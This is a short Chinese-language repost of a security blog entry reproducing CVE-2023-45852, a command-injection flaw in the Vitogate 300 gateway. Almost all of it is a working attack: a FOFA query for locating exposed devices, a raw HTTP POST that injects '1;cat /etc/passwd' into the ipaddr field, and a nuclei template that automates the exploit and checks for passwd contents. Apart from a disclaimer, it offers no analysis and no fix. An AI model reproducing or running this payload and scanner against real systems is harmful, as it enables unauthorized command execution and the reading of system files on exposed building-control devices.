Vitogate 300 Authentication命令执行漏洞复现(CVE-2023-45852)

admin 2024年2月15日20:09:59评论13 views字数 1282阅读4分16秒阅读模式

一、免责声明:

      本次文章仅限个人学习使用,如有非法用途均与作者无关,且行且珍惜;由于传播、利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号望雪阁及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除整改并向您致以歉意。谢谢!

二、产品介绍:

Vitogate 300 Authentication命令执行漏洞复现(CVE-2023-45852)

三、资产梳理:

fofa:title="Vitogate 300"

四、漏洞复现:

Vitogate 300 Authentication命令执行漏洞复现(CVE-2023-45852)

五、POC:

POST /cgi-bin/vitogate.cgi HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: langCookie=enUpgrade-Insecure-Requests: 1Content-Type: application/jsonContent-Length: 91{"method":"put","form":"form-4-8","session":"","params":{"ipaddr":"1;cat /etc/passwd"}}

Vitogate 300 Authentication命令执行漏洞复现(CVE-2023-45852)

nuclei:

id: Vitogate_rceinfo:  name: Vitogate_rce  author: joyboy  severity: critical  description: http://xxx.xxx.xxx/cgi-bin/vitogate.cgi  metadata:    max-request: 1    fofa-query: title="Vitogate 300"    verified: true  tags: cve2023,rcerequests:  - raw:      - |-        POST /cgi-bin/vitogate.cgi HTTP/1.1        Host: {{Hostname}}        Content-Type: application/json        {"method":"put","form":"form-4-8","session":"","params":{"ipaddr":"1;cat /etc/passwd"}}    req-condition: true    matchers:      - type: dsl        condition: and        dsl:          - 'contains((body), "root:/root") && status_code == 200' 

原文始发于微信公众号(fly的渗透学习笔记):Vitogate 300 Authentication命令执行漏洞复现(CVE-2023-45852)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月15日20:09:59
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Vitogate 300 Authentication命令执行漏洞复现(CVE-2023-45852)http://cn-sec.com/archives/2173017.html

发表评论

匿名网友 填写信息